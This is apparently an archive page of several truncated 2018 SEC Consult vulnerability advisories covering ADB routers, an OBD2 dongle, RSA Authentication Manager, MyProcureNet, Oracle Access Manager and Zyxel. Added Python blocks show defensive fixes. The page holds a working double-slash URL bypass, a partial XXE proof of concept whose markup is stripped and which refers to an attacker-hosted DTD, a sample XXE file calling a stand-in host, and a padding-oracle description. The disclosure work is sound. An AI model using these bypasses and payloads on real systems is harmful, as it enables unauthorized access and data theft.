possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.

An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI; deeper layers/paths (sub menus) could not be accessed during testing, but
further exploitation can't be ruled out entirely.


Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!


In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too if
deeper tests are performed.
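The mismatch behind this bypass, as an added example (not ADB's code): an ACL that matches the raw request path while the router drops the empty segment that "//" produces, beside a version that canonicalizes the path once and uses that form for both the check and the routing. The forbidden list is constructed from the paths in this proof of concept; the role names and the behaviour of the router are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Entries an ISP profile hides from a standard user. Constructed list; the
# paths are the ones from the proof of concept above.
FORBIDDEN_FOR_USER = (
    "/ui/dboard/settings/management/telnetserver",
    "/ui/dboard/settings/proxy",
)


def resolve_route(path: str) -> str:
    """Models the device's router (assumption): empty segments produced by
    '//' are dropped, so '.../management//telnetserver' still reaches the
    telnetserver handler."""
    return "/" + "/".join(seg for seg in path.split("/") if seg)


def _hits_forbidden(path: str) -> bool:
    # An entry blocks itself and everything below it.
    return any(path == f or path.startswith(f + "/") for f in FORBIDDEN_FOR_USER)


def dispatch_vulnerable(path: str, role: str) -> tuple:
    """ACL on the raw path, routing on a normalised one: two views of one URL.

    '/management//telnetserver' misses the ACL entry (no exact match, and the
    entry is not a prefix of it) yet routes to telnetserver. A blocked menu one
    level up still catches '/proxy//rtsp' through the prefix rule, which is the
    first-layer-only behaviour the advisory observed."""
    if role != "admin" and _hits_forbidden(path):
        return ("denied", None)
    return ("allowed", resolve_route(path))


def canonicalize(path: str) -> str:
    """One canonical form shared by the ACL and the router: percent-decode
    once (as the router would), then collapse '//', '.' and '..' segments.
    The leading slashes are stripped first because normpath keeps a double
    leading slash as is."""
    return posixpath.normpath("/" + unquote(path).lstrip("/"))


def dispatch_hardened(path: str, role: str) -> tuple:
    """Authorize on the canonical path and route on exactly the same string."""
    canonical = canonicalize(path)
    if role != "admin" and _hits_forbidden(canonical):
        return ("denied", None)
    return ("allowed", canonical)
```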


Vulnerable / tested versions:
-
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV

[FD] SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
  title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13108
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-09
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.

Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation and samba
configuration file parsing problem which makes it possible to access the root
file system of the device with root access rights via a manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.


This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite prob

[FD] SEC Consult SA-20180529-0 :: Unprotected WiFi access & Unencrypted data transfer in Vgate iCar2 OBD2 Dongle

2018-05-29 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180529-0 >
===
  title: Unprotected WiFi access & Unencrypted data transfer
product: Vgate iCar 2 WiFi OBD2 Dongle
 vulnerable version: Vgate iCar 2 WiFi OBD2 Dongle
  fixed version: -
 CVE number: CVE-2018-11476
 CVE-2018-11477
 CVE-2018-11478
 impact: Critical
   homepage: http://www.vgate.com.cn
  found: 2018-04-24
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Based in Shenzhen, China, Vgate Technology.co ltd. specializes in the
development, design and manufacture of diagnostic equipment, tools and
accessories in the automotive aftermarket industry.
We offer a selective range of products from automotive diagnostic tools
including code readers and scan tools, to test and inspection equipment such as
sensor testers and battery testers. Aside from the above, we also carry garage
equipment like infrared paint dryers and pipe expanders, and automotive
diagnostic accessories such as OBD diagnostic cable assemblies, SAE J1962
connectors, and vehicle to PC (or PDA) interface adapters (VAG-COM interfaces).
Though the company is young in age, we are strong in experiences in that all of
our major engineers have extensive R&D experience in the automotive aftermarket
technology. With the combination of our experienced and distinguished
specialists, low-cost manufacturing and exceptional customer service, M.B is
able to become the supplier of choice who delivers high quality products,
user-friendly designs and most competitive prices to both professional and
amateur (or DIYers) automotive technicians.

We are proud of ourselves in providing cost effective, timely and innovative
solutions with a first class service."

Source: http://www.vgate.com.cn/en/Aboutus.html


Business recommendation:

By using the vulnerabilities which are documented in this advisory an attacker
can easily send arbitrary messages to the automotive communication bus
(CAN/FlexRay/...) of the car electronics and potentially take over
safety-critical car functions.

The vendor told SEC Consult in a phone call that our identified security
issues are common practice for such hardware and therefore will not be fixed!

SEC Consult recommends not to use this product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) Unprotected WiFi Access (CVE-2018-11476)
The dongle opens an unprotected wireless LAN which cannot be configured with an
encryption / password. This enables anyone within the range of the WLAN to
connect to the network without authentication.

2) Unencrypted Data Transfer (CVE-2018-11477)
The data packets which are sent between the App and the OBD dongle are not
encrypted. The combination of this vulnerability with the lack of a wireless
network protection exposes all transferred car data to the public.

3) Unauthenticated Access to On-board Diagnostics (OBD) (CVE-2018-11478)
The OBD port is used to receive measurement data and debug information from the
car. The on-board diagnostics interface can also be used to send commands to
the car; these differ for every vendor / car product line / car.

The mentioned features are usually needed for maintenance purposes but can be
abused by attackers. This is possible because the OBD interface is directly
accessible through port 35000 on the (unprotected) wireless access point of the
OBD device.

Because it is never intended that other people have access to the data bus
(e.g. CAN) of your car while you are driving, this vulnerability is seen as
highly critical and a safety-critical threat to the public.


Proof of concept:
-
Detailed proofs of concept have been removed as the vendor did not provide
a patch.

1) Unprotected WiFi Access (CVE-2018-11476)
The unprotected wireless LAN is named "V-LINK". It is created by the "Fn-Link
(6110R-IF)" module, which acts as a wireless UART bridge handing the commands
of the App over to the ELM327 compatible "iCar-2" chip.

2) Unencrypted Data Transfer (CVE-2018-11477)
All commands starting with "AT", as well as "0100"/"0120", are strings sent
from the App to the OBD Dongle. The "X" character is a wildcard for an
arbitrary hexadecimal value and is used to anonymize car data in responses
for this advisory.

The following p

[FD] SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager

2018-05-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
===
  title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
 vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
  fixed version: 8.3 P1 and later
 CVE number: CVE-2018-1247
 impact: High
   homepage: https://www.rsa.com
  found: 2017-11-16
 by: Mantas Juskauskas (Office Vilnius)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:

By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.

SEC Consult recommends applying the available patches from the vendor.


Vulnerability overview/description:
---
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The XML parser in use resolves XML external entities, which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g. port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)


2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.

The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.


3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.


Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-1247)

The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.
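A gate for uploaded XML such as a token-job import, as an added example (not RSA's code): any DOCTYPE is rejected before a single entity can be declared, which removes the file read, the internal requests and the billion-laughs case alike. The two sample documents are constructed, and the element names in them are assumptions.

```python
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when an uploaded document carries a DTD, the carrier for XXE."""


def parse_untrusted_xml(data: bytes) -> list:
    """Parse with a no-DOCTYPE policy and return the element names seen.

    The doctype handler fires as soon as '<!DOCTYPE' is encountered, i.e.
    before any internal subset or external DTD is processed, so raising
    there stops the parse before an entity can be declared or resolved."""
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE not allowed in uploads (root={name!r}, "
                        f"system id={sysid!r})")

    parser.StartDoctypeDeclHandler = reject_doctype
    # Belt and braces: returning 0 makes expat abort instead of following an
    # external reference, should one ever get this far.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(data, True)
    return elements


# Constructed samples (the advisory's own request body is snipped above).
BENIGN_JOB = b"""<?xml version="1.0"?>
<tokenJob><user>jdoe</user><token serial="000123456789"/></tokenJob>"""

DTD_JOB = b"""<?xml version="1.0"?>
<!DOCTYPE tokenJob [ <!ENTITY % p1 SYSTEM "http://dtd-host.example/a.dtd"> %p1; ]>
<tokenJob><user>&e1;</user></tokenJob>"""


def classify(data: bytes) -> str:
    """Outcome an import endpoint would log for a given upload."""
    try:
        parse_untrusted_xml(data)
        return "accepted"
    except UnsafeXML:
        return "rejected: dtd"
    except xml.parsers.expat.ExpatError:
        return "rejected: malformed"
```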

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: :7004
Cookie: [snip]

[snip]

-9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml


/a.dtd">

&e1;

-9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"

[snip]

==

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==
# cat /var/www/a.dtd

:8080/%p1;'>">
%p2;
==

Assuming that the RSA Authentication Manager OS has network level access

Re: [FD] SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet

2018-05-14 Thread SEC Consult Vulnerability Lab
The following CVE numbers have been assigned now:
XSS issue: CVE-2018-11090
Arbitrary File Upload: CVE-2018-11091


On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
> ===
>   title: Arbitrary File Upload & Cross-site scripting
> product: MyBiz MyProcureNet
>  vulnerable version: 5.0.0
>   fixed version: unknown
>  CVE number: -
>  impact: Critical
>homepage: http://www.mybiz.net/
>   found: 2018-01-29
>  by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
>  Fikri Fadzil (Office Singapore)
>  Wan Ikram (Office Kuala Lumpur)
>  Jasveer Singh (Office Kuala Lumpur)
>  SEC Consult Vulnerability Lab
> 
>  An integrated part of SEC Consult
>  Europe | Asia | North America
> 
>  https://www.sec-consult.com
> 
> ===
> 
> Vendor description:
> ---
> "MyBiz is a company fixated on developing technology which transforms the way
> business is done online. At the intersection of what one business needs from
> another is the potential for value to be created differently. This
> intersection for the exchange of value requires technology but in
> fundamentally very different ways from traditional enterprise systems. MyBiz
> believes that the chemistry of business is the business relationships between
> enterprises. The strength of the business relationship drives the success and
> future of the business. MyBiz believes that these business relationships need
> to be captured and orchestrated. MyBiz developed our proprietary Business
> Relationship Network engine, a platform to capture business relationships as
> data to drive new business services which create value efficiently."
> 
> Source: http://www.mybiz.net/copy-of-our-story
> 
> 
> Business recommendation:
> 
> The vendor did not reply to our inquiries since February 2018 hence the issues
> might still exist in current versions.
> 
> SEC Consult recommends not to use this product until a thorough security review
> has been performed by security professionals and all identified issues have
> been resolved. It is assumed that MyBiz products are affected by further
> critical security issues.
> 
> 
> Vulnerability overview/description:
> ---
> The identified vulnerabilities can be exploited after authentication but
> the registration for the application is usually open for anyone.
> 
> 1. Arbitrary File Upload
> A malicious file can be uploaded to the webserver by an attacker. It is
> possible for an attacker to upload a script to issue operating system
> commands.
> 
> This vulnerability occurs because an attacker is able to adjust the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
> extensions to the whitelist during the upload.
> 
> For instance, if the extension .asp is added to the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
> accepts "secctest.asp" as legitimate file. Hence malicious files can be
> uploaded in order to execute arbitrary commands to take over the server.
> 
> 
> 2. Reflected Cross-site scripting
> This vulnerability within "ProxyPage.aspx" allows an attacker to inject
> malicious client side scripting which will be executed in the browser of
> users if they visit the manipulated site.
> 
> 
> Proof of concept:
> -
> The proof of concept has been removed as no patch is available.
> 
> 
> Vulnerable / tested versions:
> -
> MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable.
> This was the latest version available at the time of the test.
> 
> 
> Vendor contact timeline:
> 
> 2018-02-22: Contacting vendor through i...@mybiz.net (no response)
> 2018-02-27: Request update from vendor (no response)
> 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
> (no response)
> 2018-05-14: Public release of security advisory
> 
> 
> Solution:
> -----
> None
> 
> 
> Workaround:
> ---
> None
> 
> 
> Advisory URL:
> -
> https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
> 
> ~~~~~~~~

[FD] SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet

2018-05-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
===
  title: Arbitrary File Upload & Cross-site scripting
product: MyBiz MyProcureNet
 vulnerable version: 5.0.0
  fixed version: unknown
 CVE number: -
 impact: Critical
   homepage: http://www.mybiz.net/
  found: 2018-01-29
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 Fikri Fadzil (Office Singapore)
 Wan Ikram (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"MyBiz is a company fixated on developing technology which transforms the way
business is done online. At the intersection of what one business needs from
another is the potential for value to be created differently. This
intersection for the exchange of value requires technology but in
fundamentally very different ways from traditional enterprise systems. MyBiz
believes that the chemistry of business is the business relationships between
enterprises. The strength of the business relationship drives the success and
future of the business. MyBiz believes that these business relationships need
to be captured and orchestrated. MyBiz developed our proprietary Business
Relationship Network engine, a platform to capture business relationships as
data to drive new business services which create value efficiently."

Source: http://www.mybiz.net/copy-of-our-story


Business recommendation:

The vendor did not reply to our inquiries since February 2018 hence the issues
might still exist in current versions.

SEC Consult recommends not to use this product until a thorough security review
has been performed by security professionals and all identified issues have
been resolved. It is assumed that MyBiz products are affected by further
critical security issues.


Vulnerability overview/description:
---
The identified vulnerabilities can be exploited after authentication but
the registration for the application is usually open for anyone.

1. Arbitrary File Upload
A malicious file can be uploaded to the webserver by an attacker. It is
possible for an attacker to upload a script to issue operating system
commands.

This vulnerability occurs because an attacker is able to adjust the
"HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
extensions to the whitelist during the upload.

For instance, if the extension .asp is added to the
"HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
accepts "secctest.asp" as legitimate file. Hence malicious files can be
uploaded in order to execute arbitrary commands to take over the server.


2. Reflected Cross-site scripting
This vulnerability within "ProxyPage.aspx" allows an attacker to inject
malicious client side scripting which will be executed in the browser of
users if they visit the manipulated site.


Proof of concept:
-
The proof of concept has been removed as no patch is available.


Vulnerable / tested versions:
-
MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable.
This was the latest version available at the time of the test.


Vendor contact timeline:

2018-02-22: Contacting vendor through i...@mybiz.net (no response)
2018-02-27: Request update from vendor (no response)
2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
(no response)
2018-05-14: Public release of security advisory


Solution:
-
None


Workaround:
---
None


Advisory URL:
-----
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC C

[FD] SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)

2018-05-03 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:

Blog:
https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/

Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ



SEC Consult Vulnerability Lab Security Advisory < 20180503-0 >
===
  title: Authentication Bypass
product: Oracle Access Manager
 vulnerable version: 11.1.2.3.0, 12.2.1.3.0
  fixed version: April 2018 CPU
 CVE number: CVE-2018-2879
 impact: Critical
   homepage: https://www.oracle.com/
  found: 2017-11
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Oracle Access Management provides innovative new services that complement
traditional access management capabilities. It not only provides Web SSO with
MFA, coarse grained authorization and session management but also provides
standard SAML Federation and OAuth capabilities to enable secure access to
external cloud and mobile applications. It can be easily integrated with the
Oracle Identity Cloud Service to support hybrid access management capabilities
that can help customers to seamlessly protect on-premise and cloud applications
and workloads."

URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html


Business recommendation:

SEC Consult did not conduct a full security audit as only a cryptographic
implementation was analyzed. However, since the vulnerability was found in such
a central component of the OAM, we suspect that an insufficient amount of
attention has been given to information security.

Given the central position in an organization's security infrastructure, we
recommend Oracle's customers to either conduct a full audit of the component
or to request the results of such audits from Oracle.

The security patches from the Oracle CPU April 2018 have to be applied
immediately!


Vulnerability overview/description:
---
Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM)
is vulnerable to an authentication bypass vulnerability. An attacker can abuse
this vulnerability to log in to any resource protected by the OAM using any user
account, even administrative accounts! This security vulnerability completely
breaks the main functionality of the OAM product.

An attacker can create a scenario in which the OAM replies differently depending
on whether the PKCS#7 padding of an encrypted message is valid or invalid. This
behavior can be used to mount a padding oracle attack. An attacker can decrypt
and encrypt several messages used to communicate between the OAM and web
servers. The attack described here allows an attacker to create arbitrary
authentication cookies which are accepted by the OAM.


Proof of concept:
-
A successful user authentication with Oracle Access Manager (OAM) involves the
following steps:

1. The user accesses a protected resource.
2. A component in the web server (the Oracle Webgate) answers this request with
   a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM
   in a URL parameter.
3. The user authenticates against the OAM (e.g. with username and password).
4. The OAM redirects the user back to the web server. Information about the
   successful login is passed in the parameter "encreply".
5. The web server redirects the user to the resource that was initially
   requested. An encrypted authentication token is stored in a cookie
   (OAMAuthnCookie).
6. The authentication token in the OAMAuthnCookie cookie is used from now on
   to authenticate the user.

All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted
with a CBC cipher using the same key. This key is shared between the OAM and the
web server.

The attack exploits step 2 of the authentication process: the attacker sends
manipulated "encquery" parameters and observes the server's response.

The following shows an example of a decrypted encquery:
salt=sF/vMVV0Gkr/k+IhbrXYWg== wh=agentid wu=%2F wo=1 rh=http://server: 
ru=%2F
reqtime=151000 ctx= validate=

where
* the "salt" is a randomly generated value
* "validate" is a hash over certain parts of the message (MD5)

To conduct a padding oracle attack, an attacker would modify the second last
encrypted block of an encrypted message. Most of the time, this causes the
padding in the decrypted message to be invalid. In case the padding is accepted,
the attacker gains information 

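The padding-oracle condition described in the advisory above, as an added example that is not part of the advisory or of Oracle's code: a CBC decryptor whose reply for bad padding differs from its reply for bad content, beside an encrypt-then-MAC variant that verifies a tag (in constant time) before it ever unpads, and that derives separate keys per message type, since the advisory notes that encquery, encreply and OAMAuthnCookie share one key. The block cipher is a constructed toy Feistel permutation standing in for AES so the code runs with the standard library only; the key and field values are constructed.

```python
import hashlib, hmac, os
BLOCK = 16  # block size in bytes, as for AES

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Toy block cipher (constructed stand-in for AES so this runs offline; NOT secure):
# a 4-round Feistel permutation with an HMAC-SHA256 round function. Its inverse is
# swap halves, run rounds backwards, swap. CBC, PKCS#7 and the MAC below are real.
def _feistel(key: bytes, block: bytes, rounds) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in rounds:
        l, r = r, _xor(l, hmac.new(key, bytes([rnd]) + r, hashlib.sha256).digest()[:8])
    return l + r

class PaddingError(ValueError): pass

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = bytearray(), iv
    for i in range(0, len(padded), BLOCK):
        prev = _feistel(key, _xor(padded[i:i + BLOCK], prev), range(4))
        out += prev
    return bytes(out)

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = bytearray(), iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        dec = _feistel(key, blk[8:] + blk[:8], reversed(range(4)))
        out += _xor(dec[8:] + dec[:8], prev)
        prev = blk
    return bytes(out)

# 1) Vulnerable pattern: unauthenticated CBC, decrypt -> unpad -> parse, with a
#    different reply per failure. The reply reveals whether the padding was valid.
def weak_wrap(key: bytes, fields: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, pkcs7_pad(fields))

def weak_unwrap(key: bytes, msg: bytes) -> str:
    try:
        fields = pkcs7_unpad(cbc_decrypt(key, msg[:BLOCK], msg[BLOCK:]))
    except PaddingError:
        return "error: bad padding"       # reply A ...
    if b"validate=" not in fields:
        return "error: missing validate"  # ... reply B, distinguishable from A
    return "ok"

# 2) Hardened pattern: encrypt-then-MAC, keys separated per message type, tag
#    checked in constant time before the padding is ever looked at.
def derive_keys(master: bytes, purpose: bytes):
    enc = hmac.new(master, b"enc|" + purpose, hashlib.sha256).digest()
    mac = hmac.new(master, b"mac|" + purpose, hashlib.sha256).digest()
    return enc, mac

def strong_wrap(master: bytes, purpose: bytes, fields: bytes) -> bytes:
    enc_key, mac_key = derive_keys(master, purpose)
    iv = os.urandom(BLOCK)
    body = iv + cbc_encrypt(enc_key, iv, pkcs7_pad(fields))
    return body + hmac.new(mac_key, purpose + body, hashlib.sha256).digest()

def strong_unwrap(master: bytes, purpose: bytes, msg: bytes) -> str:
    enc_key, mac_key = derive_keys(master, purpose)
    body, tag = msg[:-32], msg[-32:]
    expected = hmac.new(mac_key, purpose + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return "error: invalid message"   # one reply for every rejection
    fields = pkcs7_unpad(cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:]))
    return "ok" if b"validate=" in fields else "error: invalid message"

def _flip(msg: bytes, idx: int, mask: int) -> bytes:
    out = bytearray(msg)
    out[idx] ^= mask
    return bytes(out)

def demo() -> dict:
    key = b"shared-webgate-oam-key-(constructed)"           # constructed
    fields = b"validate=d41d8cd9 salt=abc wh=agentid wu=/"  # constructed
    msg, auth = weak_wrap(key, fields), strong_wrap(key, b"encquery", fields)
    return {
        "weak_ok": weak_unwrap(key, msg),
        # high bit of the byte feeding the last plaintext byte: pad length > BLOCK
        "weak_pad_tampered": weak_unwrap(key, _flip(msg, -BLOCK - 1, 0x80)),
        # IV byte 0: padding intact but "validate=" corrupted, so a different reply
        "weak_body_tampered": weak_unwrap(key, _flip(msg, 0, 0x01)),
        "strong_ok": strong_unwrap(key, b"encquery", auth),
        "strong_tampered": strong_unwrap(key, b"encquery", _flip(auth, 0, 0x01)),
        "strong_wrong_purpose": strong_unwrap(key, b"cookie", auth),
    }
```

The two weak replies differ for the two tampered messages, which is exactly the observable the advisory describes; the hardened variant gives one reply for both and also rejects an encquery presented as a cookie.
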
[FD] SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products

2018-04-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 >
===
  title: Reflected Cross-Site Scripting
product: Zyxel ZyWALL: see "Vulnerable / tested version"
 vulnerable version: ZLD 4.30 and before
  fixed version: ZLD 4.31
 CVE number: -
 impact: Medium
   homepage: https://www.zyxel.com
  found: 2018-02-05
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
